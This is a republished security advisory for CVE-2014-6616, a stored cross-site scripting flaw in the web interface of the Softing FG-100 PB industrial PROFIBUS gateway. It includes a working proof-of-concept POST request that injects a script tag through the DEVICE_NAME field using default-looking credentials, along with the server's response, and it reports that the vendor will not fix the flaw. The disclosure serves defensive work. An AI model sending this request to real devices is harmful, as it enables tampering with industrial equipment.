Softing FG-100 PB Cross Site Scripting

2014.11.06
Risk: Low
Local: No
Remote: Yes
CWE: CWE-79


CVSS Base Score: 4.3/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: None
Integrity impact: Partial
Availability impact: None

############################################################# # # COMPASS SECURITY ADVISORY # http://www.csnc.ch/en/downloads/advisories.html # ############################################################# # # Product: Softing FG-100 PB # Vendor: Softing AG (www.softing.com) # CVD ID: CVE-2014-6616 # Subject: XSS # Risk: High # Effect: Remotely exploitable # Author: Johannes Klick # Daniel Marzin # Ingmar Rosenhagen # Date: 05.11.2014 # ############################################################# Introduction: ------------- Softing FG PROFIBUS [1] is a family of interfaces for remote access to one, two or three PROFIBUS segments via Ethernet for device parameterization, controller programming and data acquisition. This device is used in industrial setups for making Profibus device available via ethernet. Compass Security Deuschland GmbH [2] discovered a security flaw in the webgui of the device which allows execution of malicious code in the context of the user's browser session. Affected: --------- Firmware: FG-x00-PB_V2.02.0.00 Technical Description: ---------------------- The web gui does not properly encode output of user data in at least one place. Exploiting this vulnerability leads to stored cross-site scripting (XSS) and allows execution of JavaScript code The vulnerable resource is the 'DEVICE_NAME' parameter: POST /cgi-bin/CFGhttp HTTP/1.1 Host: 192.168.2.3 Referer: http://192.168.2.3/cgi-bin/CFGhttp second_chance=Yes&LOGIN=config&PASSWORD=password&SERIAL_NUMBER=0110000000&DE VICE_NAME=<SCRIPT>alert("XSS")</SCRIPT>&DEVICE_NAME_ORG=ROFLE&IPADDR=192.168 .2.3&IPADDR_ORG=192.168.2.3&NETMASK=255.255.255.0&NETMASK_ORG=255.255.255.0& GATEWAY=0.0.0.0&GATEWAY_ORG=&MAINTENANCE_IP=192.168.212.231&MAINTENANCE_IP_O RG=192.168.212.231&STARTUP=RELOAD Which results in the malicious code being embedded: HTTP/1.0 200 OK Content-type: text/html Cache-Control: no-cache, must-revalidate Pragma: no-cache <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN""http://www.w3.org/TR/html4/strict.dtd"> <html><head><title>Device Configuration</title></head><link rel="stylesheet" type="text/css" href="../fg300_pb/styles/fg300_pb.css"><body><h1>New Network Settings</h1><table cellspacing=0 summary=""><tr><td><strong> Host Name </strong></td><td> <SCRIPT>alert("XSS")</SCRIPT> </td><td> </td></tr><tr><td><strong> IP Address </strong></td><td> 192.168.2.3 </td><td> </td></tr><tr><td><strong> Subnet Mask </strong></td><td> 255.255.255.0 </td><td> </td></tr><tr><td><strong> Default Gateway </strong></td><td> </td><td> </td></tr><tr><td><strong> Maintenance IP Address </strong></td><td> 192.168.212.231 </td><td> </td></tr><tr><td><strong> New network parameters will be used </strong></td><td> immediately </td><td></td></tr></table><br></body></html> Workaround / Fix: ----------------- no patch is available Timeline: --------- Vendor Notified: 2014-09-15 Vendor Response: 2014-10-24 Vendor Status: Wont fix References: ----------- [1]: http://industrial.softing.com/de/produkte/profibus-master-or-slave-configura ble-single-channel-remote-interface.html [2]: http://www.csnc.de

References:

http://industrial.softing.com/de/produkte/profibus-master-or-slave-configurable-single-channel-remote-interface.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top